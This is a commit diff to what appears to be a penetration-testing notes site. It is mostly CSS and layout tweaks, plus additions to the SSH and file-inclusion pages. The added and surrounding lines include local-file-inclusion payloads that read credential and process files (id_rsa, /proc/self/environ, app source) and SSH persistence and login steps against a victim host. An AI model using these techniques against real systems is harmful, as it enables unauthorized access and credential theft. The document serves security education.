updated LFI

hideckies · Jun 15, 2024 · 2d8f726 · 2d8f726
1 parent ad2a0c8
commit 2d8f726
Show file tree

Hide file tree

Showing 7 changed files with 62 additions and 32 deletions.
diff --git a/_config.ts b/_config.ts
@@ -92,7 +92,7 @@ site
                 'transparent': 'transparent',
             },
             fontFamily: {
-                basisc: ["sans-serif"],
+                base: ["Calibri, sans-serif"],
                 title: ["courier"],
             }
         }
@@ -123,7 +123,7 @@ site.process([".html"], (pages: Lume.Page[]) => {
                             const aElem = page.document.createElement('a');
                             aElem.setAttribute("href", `#${c.slug}`);
                             aElem.innerHTML = c.text;
-                            aElem.classList.add('text-sm');
+                            aElem.classList.add('text-md');
                             aElem.classList.add('hover:brightness-200');
                             aElem.classList.add('break-words');
 

diff --git a/src/_components/header.vto b/src/_components/header.vto
@@ -2,7 +2,7 @@
     <div class="md:mx-auto w-full md:w-2/3 h-full flex justify-around items-center">
         <div
             class="
-                w-full md:w-2/3 lg:w-1/2 h-full flex flex-col md:flex-row items-center
+                w-full md:w-3/4 lg:w-2/3 h-full flex flex-col md:flex-row items-center
                 md:gap-x-3 gap-y-3 md:gap-y-0
             "
         >
@@ -12,7 +12,7 @@
                 </span>
             </a>
             {{# Search UI #}}
-            <div id="search" class=""></div>
+            <div id="search"></div>
         </div>
 
         {{# Links #}}

diff --git a/src/_includes/layouts/exploit.vto b/src/_includes/layouts/exploit.vto
@@ -8,7 +8,8 @@ bodyClass: body-exploit
     {{# Left side #}}
     <div
         id="exploit-leftside-inner"
-        class="hidden sm:block w-full h-screen overflow-y-auto px-4 py-3">
+        class="hidden sm:block w-full h-screen overflow-y-auto px-4 py-3"
+    >
         <div class="w-full">
             <div id="exploit-related">
                 {{ for menu of related_menus }}
@@ -22,7 +23,7 @@ bodyClass: body-exploit
                         {{ else }}
                             <a
                                 href="{{ page.url }}"
-                                class="text-sm text-pink-light hover:brightness-200">
+                                class="text-md text-pink-light hover:brightness-200">
                                 {{ page.title }}
                             </a>
                         {{ /if }}
@@ -35,13 +36,13 @@ bodyClass: body-exploit
                             {{ if page.url == url }}
                                 <span
                                     id="scroll-target"
-                                    class="text-sm text-white">
+                                    class="text-md text-white">
                                     {{ page.title }}
                                 </span>
                             {{ else }}
                                 <a
                                     href="{{ page.url }}"
-                                    class="text-sm text-pink-light hover:brightness-200">
+                                    class="text-md text-pink-light hover:brightness-200">
                                     {{ page.title }}
                                 </a>
                             {{ /if }}
@@ -124,4 +125,4 @@ bodyClass: body-exploit
         </div>
     </div>
     {{# /Right side #}}
-</div>
+</div>
diff --git a/src/exploit/network/protocol/ssh-pentesting.md b/src/exploit/network/protocol/ssh-pentesting.md
@@ -7,7 +7,7 @@ tags:
     - Privilege Escalation
 refs:
     - https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
-date: 2024-04-13
+date: 2024-06-15
 draft: false
 ---
 
@@ -259,6 +259,17 @@ In remote machine,
 echo '<content of id_rsa.pub' >> /home/<victim-user>/.ssh/authorized_keys
 ```
 
+### 4. Login with Private Key
+
+In local machine, we have a SSH private key in local machine so we can login the target SSH server with it.
+
+```bash
+# Change permission of the private key ('key', here)
+chmod 600 key
+# Login with it
+ssh victim@<target-ip> -i key
+```
+
 <br />
 
 ## SSH Server

diff --git a/src/exploit/web/security-risk/file-inclusion.md b/src/exploit/web/security-risk/file-inclusion.md
@@ -5,7 +5,7 @@ tags:
     - Web
 refs:
     - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
-date: 2024-04-01
+date: 2024-06-15
 draft: false
 ---
 
@@ -111,8 +111,11 @@ When our payload is successful, we can additionaly investigate local files and r
 ?pgae=/root/.profile
 ?page=/root/.ssh/id_rsa
 
-# Environment variables
+# Processes
+?page=/proc/net/tcp
+?page=/proc/self/cmdline
 ?page=/proc/self/environ
+?page=/proc/<pid>/cmdline
 ?page=/proc/<pid>/environ
 
 # Mail
@@ -173,6 +176,16 @@ When our payload is successful, we can additionaly investigate local files and r
 ?page=/etc/php/x.x/cli/php.ini
 ?page=/etc/php/x.x/fpm/php.ini
 
+# Flask
+?page=index.html
+?page=../__init__.py
+?page=../app.py
+?page=../db.py
+?page=../main.py
+?page=/home/<username>/<appname>/app.py
+?page=/opt/<appname>/app.py
+?page=/srv/<appname>/app.py
+
 # BIND
 ?page=/etc/bind/named.conf
 ?page=/etc/bind/named.conf.options

diff --git a/src/exploit/web/security-risk/sql-injection-cheat-sheet.md b/src/exploit/web/security-risk/sql-injection-cheat-sheet.md
@@ -112,7 +112,7 @@ admin or 1=1#
 
 ## Blind Injection - Timing
 
-Reference: [https://book.hacktricks.xyz/pentesting-web/sql-injection#confirming-with-timing](https://book.hacktricks.xyz/pentesting-web/sql-injection#confirming-with-timing)
+Reference: [HackTricks](https://book.hacktricks.xyz/pentesting-web/sql-injection#confirming-with-timing)
 
 Using **sleep** method for each query, if results are displayed with a delay, SQLi affects that.
 
@@ -152,7 +152,7 @@ test' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))
 
 ## WAF Bypass
 
-Reference: [https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF](https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF)
+Reference: [OWASP](https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF)
 
 If website filters to prevent our payloads, we need to bypass the filter.
 
@@ -465,7 +465,7 @@ After execution, we may get a shell of target system.
 
 ## Error-based SQLi
 
-Reference: [https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based](https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based)
+Reference: [PortSwigger](https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based)
 
 We might be able to gather information of the database by leading the error message. We can construct SQLi while checking error messages.  
 Here are MySQL injection examples.
@@ -628,7 +628,7 @@ We can write arbitary code to a file as below.
 
 ## XML Filter Bypass
 
-Reference: [https://portswigger.net/web-security/sql-injection](https://portswigger.net/web-security/sql-injection)
+Reference: [PortSwigger](https://portswigger.net/web-security/sql-injection)
 
 ```xml
 <storeId>

diff --git a/src/styles.css b/src/styles.css
@@ -20,6 +20,9 @@
     --color-emerald-dark: #064e3b;
     --color-emerald-light: #059669;
 
+    --font-family-base: Calibri, sans-serif;
+    --font-family-title: courier, sans-serif;
+
     /* Pagefind UI */
     --pagefind-ui-scale: 0.6;
     --pagefind-ui-primary: red;
@@ -31,7 +34,12 @@
     /* --pagefind-ui-border-radius: 6px; */
     --pagefind-ui-image-border-radius: 2px;
     --pagefind-ui-image-box-ratio: 3 / 1;
-    --pagefind-ui-font: sans-serif;
+    --pagefind-ui-font: var(--font-family-base);
+}
+
+* {
+    scrollbar-color: var(--color-pink-dark) transparent;
+    scrollbar-width: thin;
 }
 
 html,body {
@@ -40,20 +48,13 @@ html,body {
     overflow-x: hidden;
 }
 
-a {
-    color: var(--color-pink-light);
+body {
+    font-family: var(--font-family-base);
+    font-size: 1.1em;
 }
 
-/* Scroll bar */
-::-webkit-scrollbar {
-    width: 5px;
-    height: 5px;
-}
-::-webkit-scrollbar-thumb {
-    background: var(--color-pink-dark);
-}
-::-webkit-scrollbar-corner {
-    background: none;
+a {
+    color: var(--color-pink-light);
 }
 
 /* Pagefind */
@@ -71,6 +72,7 @@ a {
 
 #search .pagefind-ui__search-input {
     transition: 0.1s;
+    font-size: 1.1em;
 }
 #search .pagefind-ui__search-input:focus {
     outline: 1.4px solid var(--color-pink-light);
@@ -95,6 +97,7 @@ a {
 
 #search .pagefind-ui__message {
     margin: 0;
+    font-size: 0.9em;
 }
 
 #search .pagefind-ui__results-area {
@@ -118,7 +121,7 @@ a {
 
 #search .pagefind-ui__result-link {
     color: var(--color-pink-light);
-    font-size: 1.1em;
+    font-size: 1.3em;
 }
 #search .pagefind-ui__result-link:hover {
     filter: brightness(1.4);
@@ -140,10 +143,13 @@ a {
 }
 
 #search .pagefind-ui__button {
+    height: initial;
+    padding: 8px 0;
+    font-size: 1.05em;
     color: var(--color-pink-light);
 }
 #search .pagefind-ui__button:hover {
-    filter: brightness(1.4);
+    filter: brightness(1.2);
 }
 
 /* Code blocks */
@@ -279,5 +285,4 @@ td {
 }
 
 @media (min-width: 640px) {
-
 }